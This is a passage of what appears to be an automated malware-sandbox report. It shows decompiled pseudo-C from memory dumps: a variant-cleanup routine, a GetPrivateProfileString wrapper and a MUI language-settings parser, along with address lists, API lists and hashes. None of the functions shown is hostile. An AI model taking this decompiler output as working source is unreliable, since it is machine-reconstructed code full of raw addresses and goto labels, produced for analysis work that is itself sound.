							_push(_v36);
							L00B82082();
							goto L30;
						} else {
							goto L28;
						}
						do {
							L28:
							__imp__#9(_v36 + _t191);
							_t144 = _t144 + 1;
							_t191 = _t191 + 0x10;
							__eflags = _t144 - _v28;
						} while (_t144 < _v28);
						goto L29;
					}
					__eflags = _v20;
					if(_v20 != 0) {
						_t112 = lstrlenW( *(_t189 + 8));
						_t113 = lstrlenW(_v8);
						_t184 = _t112 + _t113;
						__imp__#4(0, _t112 + _t113);
						_v12 = _t113;
						__eflags = _t113;
						if(_t113 == 0) {
							L22:
							_t182 = 0x8007000e;
							goto L26;
						}
						E00B831BD(_t113, _t184 + 1,  *(_t189 + 8));
						E00B836CD(_v12, _t184 + 1, _v8);
						_t153 =  *0xb97010; // 0x0
						_t182 = E00B9054D(_t153,  &_v16);
						__eflags = _t182;
						if(_t182 < 0) {
							goto L26;
						}
						_t118 = _v16;
						_a8 = _a8 & 0x00000000;
						_t182 =  *((intOrPtr*)( *_t118 + 0x14))(_t118, 0xb81804,  &_v12, 1, _a16,  &_a8);
						__eflags = _t182;
						if(_t182 >= 0) {
							_t147 = _a24;
							_t155 =  *(_t147 + 0xc);
							__eflags = _t155;
							if(__eflags <= 0) {
								L13:
								_a4 =  &_v36;
								_t122 =  *((intOrPtr*)(_t147 + 8)) + 1;
								_v24 = _t155 + 1;
								_t176 = 0x10;
								_v28 = _t122;
								_t123 = _t122 * _t176;
								_push( ~(0 | __eflags > 0x00000000) | _t123);
								L00B82877();
								_v36 = _t123;
								__eflags = _t123;
								if(_t123 == 0) {
									goto L22;
								}
								_t162 = 9;
								 *_t123 = _t162;
								_v36[4] =  *(_t189 + 4);
								_t192 =  *(_t189 + 4);
								 *((intOrPtr*)( *_t192 + 4))(_t192);
								_t187 = 1;
								__eflags = _v28 - 1;
								if(_v28 <= 1) {
									L17:
									_a12 = 1;
									__eflags = _v28 - 1;
									if(__eflags <= 0) {
										L21:
										_t178 = 4;
										_t130 = _v24 * _t178;
										_push( ~(0 | __eflags > 0x00000000) | _t130);
										L00B82877();
										_v32 = _t130;
										__eflags = _t130;
										if(_t130 != 0) {
											 *_t130 = 0xfffffd9b;
											_t132 = 1;
											__eflags = _v24 - 1;
											if(_v24 <= 1) {
												L25:
												__imp__#201(0, 0);
												_t133 = _v16;
												_t182 =  *((intOrPtr*)( *_t133 + 0x18))(_t133, _a8, 0xb81804, _a16, _a20, _a4, _a28, _a32, _a36);
												goto L26;
											} else {
												goto L24;
											}
											do {
												L24:
												 *((intOrPtr*)(_v32 + _t132 * 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t147 + 4)) + _t132 * 4 - 4));
												_t132 = _t132 + 1;
												__eflags = _t132 - _v24;
											} while (_t132 < _v24);
											goto L25;
										}
										goto L22;
									}
									_t193 = 0x10;
									while(1) {
										_t138 = _v36 + _t193;
										__imp__#10(_t138,  *_t147 + _t193 - 0x10);
										_t182 = _t138;
										__eflags = _t182;
										if(_t182 < 0) {
											goto L26;
										}
										_a12 = _a12 + 1;
										_t193 = _t193 + 0x10;
										__eflags = _a12 - _v28;
										if(__eflags < 0) {
											continue;
										}
										goto L21;
									}
									goto L26;
								}
								_t194 = 0x10;
								do {
									__imp__#8(_v36 + _t194);
									_t187 = _t187 + 1;
									_t194 = _t194 + 0x10;
									__eflags = _t187 - _v28;
								} while (_t187 < _v28);
								goto L17;
							}
							__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t147 + 4)))) - 0xfffffd9b;
							if(__eflags != 0) {
								goto L13;
							}
							_a4 = _t147;
							goto L25;
						}
						__eflags = _t182 - 0x80020006;
						if(_t182 == 0x80020006) {
							_t182 = 0;
						}
						goto L26;
					}
					_t182 = 0x8000ffff;
					goto L26;
				} else {
					_t182 = 0x80070057;
					L38:
					return _t182;
				}
			}





































                                                        0x00b90078
                                                        0x00b90082
                                                        0x00b90084
                                                        0x00b90087
                                                        0x00b9008a
                                                        0x00b9008d
                                                        0x00b90090
                                                        0x00b90093
                                                        0x00b90096
                                                        0x00b90099
                                                        0x00b900a5
                                                        0x00b900a8
                                                        0x00b900be
                                                        0x00b900c0
                                                        0x00b900c2
                                                        0x00b9029f
                                                        0x00b9029f
                                                        0x00b902a1
                                                        0x00b902a4
                                                        0x00b902cb
                                                        0x00b902cd
                                                        0x00b902d0
                                                        0x00b902d2
                                                        0x00b902d5
                                                        0x00b902da
                                                        0x00b902db
                                                        0x00b902e1
                                                        0x00b902e4
                                                        0x00b902e9
                                                        0x00b902e9
                                                        0x00b902eb
                                                        0x00b902ee
                                                        0x00b902f3
                                                        0x00b902f3
                                                        0x00b902f5
                                                        0x00b902f8
                                                        0x00b902fa
                                                        0x00b902ff
                                                        0x00b902ff
                                                        0x00000000
                                                        0x00b902fa
                                                        0x00b902a6
                                                        0x00b902a8
                                                        0x00b902ab
                                                        0x00b902c2
                                                        0x00b902c2
                                                        0x00b902c5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b902ad
                                                        0x00b902ad
                                                        0x00b902b3
                                                        0x00b902b9
                                                        0x00b902ba
                                                        0x00b902bd
                                                        0x00b902bd
                                                        0x00000000
                                                        0x00b902ad
                                                        0x00b900c8
                                                        0x00b900cb
                                                        0x00b900e0
                                                        0x00b900e7
                                                        0x00b900e9
                                                        0x00b900ee
                                                        0x00b900f4
                                                        0x00b900f7
                                                        0x00b900f9
                                                        0x00b90248
                                                        0x00b90248
                                                        0x00000000
                                                        0x00b90248
                                                        0x00b90105
                                                        0x00b90111
                                                        0x00b90116
                                                        0x00b90128
                                                        0x00b9012a
                                                        0x00b9012c
                                                        0x00000000
                                                        0x00000000
                                                        0x00b90132
                                                        0x00b90135
                                                        0x00b90151
                                                        0x00b90153
                                                        0x00b90155
                                                        0x00b9016a
                                                        0x00b9016d
                                                        0x00b90170
                                                        0x00b90172
                                                        0x00b90187
                                                        0x00b9018a
                                                        0x00b90190
                                                        0x00b90192
                                                        0x00b90199
                                                        0x00b9019a
                                                        0x00b9019d
                                                        0x00b901a6
                                                        0x00b901a7
                                                        0x00b901ad
                                                        0x00b901b0
                                                        0x00b901b2
                                                        0x00000000
                                                        0x00000000
                                                        0x00b901ba
                                                        0x00b901bb
                                                        0x00b901c4
                                                        0x00b901c7
                                                        0x00b901cd
                                                        0x00b901d2
                                                        0x00b901d3
                                                        0x00b901d6
                                                        0x00b901f0
                                                        0x00b901f3
                                                        0x00b901f6
                                                        0x00b901f9
                                                        0x00b90229
                                                        0x00b90230
                                                        0x00b90231
                                                        0x00b9023a
                                                        0x00b9023b
                                                        0x00b90241
                                                        0x00b90244
                                                        0x00b90246
                                                        0x00b9024f
                                                        0x00b90257
                                                        0x00b90258
                                                        0x00b9025b
                                                        0x00b90270
                                                        0x00b90274
                                                        0x00b9027d
                                                        0x00b9029d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9025d
                                                        0x00b9025d
                                                        0x00b90267
                                                        0x00b9026a
                                                        0x00b9026b
                                                        0x00b9026b
                                                        0x00000000
                                                        0x00b9025d
                                                        0x00000000
                                                        0x00b90246
                                                        0x00b901fd
                                                        0x00b901fe
                                                        0x00b90208
                                                        0x00b9020b
                                                        0x00b90211
                                                        0x00b90213
                                                        0x00b90215
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9021b
                                                        0x00b90221
                                                        0x00b90224
                                                        0x00b90227
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b90227
                                                        0x00000000
                                                        0x00b901fe
                                                        0x00b901da
                                                        0x00b901db
                                                        0x00b901e1
                                                        0x00b901e7
                                                        0x00b901e8
                                                        0x00b901eb
                                                        0x00b901eb
                                                        0x00000000
                                                        0x00b901db
                                                        0x00b90177
                                                        0x00b9017d
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9017f
                                                        0x00000000
                                                        0x00b9017f
                                                        0x00b90157
                                                        0x00b9015d
                                                        0x00b90163
                                                        0x00b90163
                                                        0x00000000
                                                        0x00b9015d
                                                        0x00b900cd
                                                        0x00000000
                                                        0x00b9009b
                                                        0x00b9009b
                                                        0x00b90302
                                                        0x00b90308
                                                        0x00b90308

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ??3@FreeString$ClearVariant
                                                        • String ID:
                                                        • API String ID: 248599420-0
                                                        • Opcode ID: 01a6eead6d5ae8837fe9a723a3366498646b5452d41793284d01fd4e29973d06
                                                        • Instruction ID: 1ada4fac2ffce3c6025e45af9ea8a1ea779b15e916a3274f7a085f320b0b9ccf
                                                        • Opcode Fuzzy Hash: 01a6eead6d5ae8837fe9a723a3366498646b5452d41793284d01fd4e29973d06
                                                        • Instruction Fuzzy Hash: D191417591021AEFCF11EFA8C889AAE7BF5FF48311F1444B9E515AB250DB31D941CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B9374D, Relevance: 19.7, APIs: 13, Instructions: 184COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 92%
                                                        			E00B9374D(void* __edx, short* _a4, short* _a8, short* _a12, short* _a16, long _a20, short* _a24) {
				signed int _v8;
				char* _v12;
				CHAR* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t46;
				int _t48;
				signed int _t51;
				int _t54;
				int _t57;
				void* _t61;
				char* _t63;
				int _t68;
				void* _t75;
				int _t76;
				int _t77;
				signed int _t78;
				CHAR* _t79;
				intOrPtr _t81;

				_t75 = __edx;
				_t46 =  *0xb97004; // 0xbb40e64e
				_v8 = _t46 ^ _t78;
				_t81 =  *0xb97001; // 0x0
				if(_t81 == 0) {
					_t77 = WideCharToMultiByte;
					_t76 = _t76 | 0xffffffff;
					_t48 = WideCharToMultiByte(0, 0, _a4, _t76, 0, 0, 0, 0);
					_v12 = _t48;
					if(_t48 != 0) {
						E00B8320B(_t48);
						_v28 = _t79;
						if(_t79 != 0) {
							if(WideCharToMultiByte(0, 0, _a4, _t76, _v28, _v12, 0, 0) == 0) {
								goto L3;
							}
							_t54 = WideCharToMultiByte(0, 0, _a8, _t76, 0, 0, 0, 0);
							_v12 = _t54;
							if(_t54 == 0) {
								goto L3;
							}
							E00B8320B(_t54);
							_v24 = _t79;
							if(_t79 == 0) {
								goto L6;
							}
							if(WideCharToMultiByte(0, 0, _a8, _t76, _v24, _v12, 0, 0) == 0) {
								goto L3;
							}
							_t57 = WideCharToMultiByte(0, 0, _a12, _t76, 0, 0, 0, 0);
							_v12 = _t57;
							if(_t57 == 0) {
								goto L3;
							}
							E00B8320B(_t57);
							_v20 = _t79;
							if(_t79 == 0) {
								goto L6;
							}
							if(WideCharToMultiByte(0, 0, _a12, _t76, _v20, _v12, 0, 0) == 0) {
								goto L3;
							}
							if(lstrlenW(_a24) <= 0) {
								_t61 = 4;
								E00B8321E(_t61);
								_t63 = _t79;
								_v16 = _t63;
								if(_t63 == 0) {
									goto L6;
								}
								 *_t63 = 0;
								L21:
								_t77 = _a20;
								E00B8320B(_t77 + 1);
								_v12 = _t79;
								if(_t79 == 0) {
									goto L6;
								}
								GetPrivateProfileStringA(_v24, _v20, _v16, _v12, _t77, _v28);
								if(MultiByteToWideChar(0, 0, _v12, _t76, _a16, _t77) == 0) {
									goto L3;
								}
								L23:
								_t51 = 0;
								L24:
								return E00B81335(_t51, 0, _v8 ^ _t78, _t75, _t76, _t77);
							}
							_t68 = WideCharToMultiByte(0, 0, _a24, _t76, 0, 0, 0, 0);
							_v12 = _t68;
							if(_t68 == 0) {
								goto L3;
							}
							E00B8320B(_t68);
							_v16 = _t79;
							if(_t79 == 0) {
								goto L6;
							}
							if(WideCharToMultiByte(0, 0, _a24, _t76, _v16, _v12, 0, 0) == 0) {
								goto L3;
							}
							goto L21;
						}
						L6:
						_t51 = 0x8007000e;
						goto L24;
					}
					L3:
					_t51 = GetLastError();
					if(_t51 > 0) {
						_t51 = _t51 & 0x0000ffff | 0x80070000;
					}
					goto L24;
				}
				GetPrivateProfileStringW(_a8, _a12, _a24, _a16, _a20, _a4);
				goto L23;
			}



























                                                        0x00b9374d
                                                        0x00b93755
                                                        0x00b9375c
                                                        0x00b93764
                                                        0x00b9376a
                                                        0x00b93789
                                                        0x00b93793
                                                        0x00b9379c
                                                        0x00b9379e
                                                        0x00b937a3
                                                        0x00b937c2
                                                        0x00b937c7
                                                        0x00b937cc
                                                        0x00b937ea
                                                        0x00000000
                                                        0x00000000
                                                        0x00b937f6
                                                        0x00b937f8
                                                        0x00b937fd
                                                        0x00000000
                                                        0x00000000
                                                        0x00b937ff
                                                        0x00b93804
                                                        0x00b93809
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9381d
                                                        0x00000000
                                                        0x00000000
                                                        0x00b93829
                                                        0x00b9382b
                                                        0x00b93830
                                                        0x00000000
                                                        0x00000000
                                                        0x00b93836
                                                        0x00b9383b
                                                        0x00b93840
                                                        0x00000000
                                                        0x00000000
                                                        0x00b93854
                                                        0x00000000
                                                        0x00000000
                                                        0x00b93865
                                                        0x00b938aa
                                                        0x00b938ab
                                                        0x00b938b0
                                                        0x00b938b2
                                                        0x00b938b7
                                                        0x00000000
                                                        0x00000000
                                                        0x00b938bd
                                                        0x00b938bf
                                                        0x00b938bf
                                                        0x00b938c5
                                                        0x00b938ca
                                                        0x00b938cf
                                                        0x00000000
                                                        0x00000000
                                                        0x00b938e5
                                                        0x00b938fd
                                                        0x00000000
                                                        0x00000000
                                                        0x00b93903
                                                        0x00b93903
                                                        0x00b93905
                                                        0x00b93916
                                                        0x00b93916
                                                        0x00b93871
                                                        0x00b93873
                                                        0x00b93878
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9387e
                                                        0x00b93883
                                                        0x00b93888
                                                        0x00000000
                                                        0x00000000
                                                        0x00b938a0
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b938a6
                                                        0x00b937ce
                                                        0x00b937ce
                                                        0x00000000
                                                        0x00b937ce
                                                        0x00b937a5
                                                        0x00b937a5
                                                        0x00b937ad
                                                        0x00b937b8
                                                        0x00b937b8
                                                        0x00000000
                                                        0x00b937ad
                                                        0x00b9377e
                                                        0x00000000

                                                        APIs
                                                        • GetPrivateProfileStringW.KERNEL32(00000104,?,00000000,?,00000104,?), ref: 00B9377E
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000104,00000000,00000000,00000000,00000000,00000104,?,00000000,00000104,?,?,00000104,?), ref: 00B9379C
                                                        • GetLastError.KERNEL32 ref: 00B937A5
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteCharErrorLastMultiPrivateProfileStringWide
                                                        • String ID:
                                                        • API String ID: 3760252266-0
                                                        • Opcode ID: 56f8617956cef3ab18aec50d10aba173b699acd4485b259928eb103cfc5cf650
                                                        • Instruction ID: 2d8f67f0b3fcd49b64776dde909b3eacb6a6eba4fa708d96764bf7dfd8b8f24c
                                                        • Opcode Fuzzy Hash: 56f8617956cef3ab18aec50d10aba173b699acd4485b259928eb103cfc5cf650
                                                        • Instruction Fuzzy Hash: 90512AF290114EBEAF116FE18CC5DBF7EFDEB05B94B1444A9F611A2020D6358E61DBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 022F8788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 94%
                                                        			E022F8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E022F8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E022DE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E022F718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E022F8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E022DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E022F718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E022F8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E022F8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E022F8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E022DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E022DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E022F718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E022DE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E022D2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E022EE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E022DE2A8(_t322,  &_v68, _v16);
								if(E022F5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E022EE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E022DE2A8(_t322,  &_v68, _t236);
								if(E022F5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E022DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E022DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E022F718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E022DE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E022D2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E022EE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E022DE2A8(_v12,  &_v68, _v16);
							if(E022F5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E022EE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E022DE2A8(_t322,  &_v68, _t269);
							if(E022F5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E022DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E022DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E022F718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E022DE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E022D2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E022EE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E022DE2A8(_v12,  &_v68, _v16);
						if(E022F5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E022EE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E022DE2A8(_t322,  &_v68, _t296);
						if(E022F5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E022DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E022DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                        0x022f8788
                                                        0x022f8788
                                                        0x022f8791
                                                        0x022f8794
                                                        0x022f8798
                                                        0x022f879b
                                                        0x022f879e
                                                        0x022f87a1
                                                        0x022f87a4
                                                        0x022f87a7
                                                        0x022f87aa
                                                        0x022f87af
                                                        0x02341ad3
                                                        0x022f8b0a
                                                        0x022f8b0d
                                                        0x022f8b13
                                                        0x022f8b19
                                                        0x022f8b1f
                                                        0x022f8b25
                                                        0x022f8b2b
                                                        0x022f8b31
                                                        0x022f8b37
                                                        0x022f8b3d
                                                        0x022f8b46
                                                        0x022f8b46
                                                        0x022f87c6
                                                        0x022f87d0
                                                        0x02341ae0
                                                        0x02341ae6
                                                        0x02341af8
                                                        0x02341af8
                                                        0x02341afd
                                                        0x02341afe
                                                        0x02341b01
                                                        0x02341b06
                                                        0x02341b06
                                                        0x022f87d6
                                                        0x022f87f2
                                                        0x022f87f7
                                                        0x022f8807
                                                        0x022f880a
                                                        0x022f880f
                                                        0x022f8810
                                                        0x022f8813
                                                        0x022f8818
                                                        0x022f8818
                                                        0x022f882c
                                                        0x022f8831
                                                        0x022f8838
                                                        0x022f8908
                                                        0x022f8920
                                                        0x022f89f0
                                                        0x022f8a08
                                                        0x022f8af6
                                                        0x022f8af6
                                                        0x022f8af8
                                                        0x022f8afb
                                                        0x02341beb
                                                        0x02341beb
                                                        0x022f8b04
                                                        0x02341bf8
                                                        0x02341c0e
                                                        0x02341c13
                                                        0x02341c16
                                                        0x02341c16
                                                        0x02341bf8
                                                        0x00000000
                                                        0x022f8b04
                                                        0x022f8a0e
                                                        0x022f8a11
                                                        0x022f8a14
                                                        0x022f8a15
                                                        0x022f8a18
                                                        0x022f8a22
                                                        0x022f8b59
                                                        0x022f8a28
                                                        0x022f8a3c
                                                        0x022f8a3c
                                                        0x022f8a42
                                                        0x02341bb0
                                                        0x02341b11
                                                        0x02341b11
                                                        0x00000000
                                                        0x022f8a48
                                                        0x022f8a51
                                                        0x022f8a5b
                                                        0x022f8a5e
                                                        0x022f8a61
                                                        0x022f8a69
                                                        0x022f8a69
                                                        0x022f8a6d
                                                        0x00000000
                                                        0x00000000
                                                        0x022f8a74
                                                        0x022f8a7c
                                                        0x022f8a7d
                                                        0x022f8a91
                                                        0x022f8a93
                                                        0x022f8a93
                                                        0x022f8a98
                                                        0x022f8a9b
                                                        0x022f8aa1
                                                        0x022f8aa1
                                                        0x022f8aa4
                                                        0x022f8aaa
                                                        0x022f8ab1
                                                        0x022f8ac5
                                                        0x022f8ac7
                                                        0x022f8ac7
                                                        0x022f8ac5
                                                        0x022f8ace
                                                        0x02341bc9
                                                        0x02341bce
                                                        0x02341bd2
                                                        0x02341bd2
                                                        0x022f8ad8
                                                        0x022f8aeb
                                                        0x022f8aeb
                                                        0x022f8af0
                                                        0x022f8af4
                                                        0x00000000
                                                        0x022f8af4
                                                        0x022f8a42
                                                        0x022f8926
                                                        0x022f8929
                                                        0x022f892c
                                                        0x022f892d
                                                        0x022f8930
                                                        0x022f8935
                                                        0x022f893a
                                                        0x022f8b51
                                                        0x022f8940
                                                        0x022f8954
                                                        0x022f8954
                                                        0x022f895a
                                                        0x02341b63
                                                        0x00000000
                                                        0x022f8960
                                                        0x022f8969
                                                        0x022f8973
                                                        0x022f8976
                                                        0x022f8979
                                                        0x022f897e
                                                        0x022f8981
                                                        0x022f8981
                                                        0x022f8986
                                                        0x00000000
                                                        0x00000000
                                                        0x02341b6e
                                                        0x02341b74
                                                        0x02341b7b
                                                        0x02341b8f
                                                        0x02341b91
                                                        0x02341b91
                                                        0x02341b99
                                                        0x02341b9c
                                                        0x02341ba2
                                                        0x02341ba2
                                                        0x022f898c
                                                        0x022f8992
                                                        0x022f8999
                                                        0x022f89ad
                                                        0x02341ba8
                                                        0x02341ba8
                                                        0x022f89ad
                                                        0x022f89b6
                                                        0x022f89c8
                                                        0x022f89cd
                                                        0x022f89d0
                                                        0x022f89d0
                                                        0x022f89d6
                                                        0x022f89e8
                                                        0x022f89e8
                                                        0x022f89ed
                                                        0x00000000
                                                        0x022f89ed
                                                        0x022f895a
                                                        0x022f883e
                                                        0x022f8841
                                                        0x022f8844
                                                        0x022f8845
                                                        0x022f8848
                                                        0x022f884d
                                                        0x022f8852
                                                        0x022f8b49
                                                        0x022f8858
                                                        0x022f886c
                                                        0x022f886c
                                                        0x022f8872
                                                        0x02341b0e
                                                        0x00000000
                                                        0x022f8878
                                                        0x022f8881
                                                        0x022f888b
                                                        0x022f888e
                                                        0x022f8891
                                                        0x022f8896
                                                        0x022f8899
                                                        0x022f8899
                                                        0x022f889e
                                                        0x00000000
                                                        0x00000000
                                                        0x02341b21
                                                        0x02341b27
                                                        0x02341b2e
                                                        0x02341b42
                                                        0x02341b44
                                                        0x02341b44
                                                        0x02341b4c
                                                        0x02341b4f
                                                        0x02341b55
                                                        0x02341b55
                                                        0x022f88a4
                                                        0x022f88aa
                                                        0x022f88b1
                                                        0x022f88c5
                                                        0x02341b5b
                                                        0x02341b5b
                                                        0x022f88c5
                                                        0x022f88ce
                                                        0x022f88e0
                                                        0x022f88e5
                                                        0x022f88e8
                                                        0x022f88e8
                                                        0x022f88ee
                                                        0x022f8900
                                                        0x022f8900
                                                        0x022f8905
                                                        0x00000000
                                                        0x022f8905

                                                        APIs
                                                        Strings
                                                        • Kernel-MUI-Language-Allowed, xrefs: 022F8827
                                                        • Kernel-MUI-Number-Allowed, xrefs: 022F87E6
                                                        • Kernel-MUI-Language-SKU, xrefs: 022F89FC
                                                        • Kernel-MUI-Language-Disallowed, xrefs: 022F8914
                                                        • WindowsExcludedProcs, xrefs: 022F87C1
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp Download File
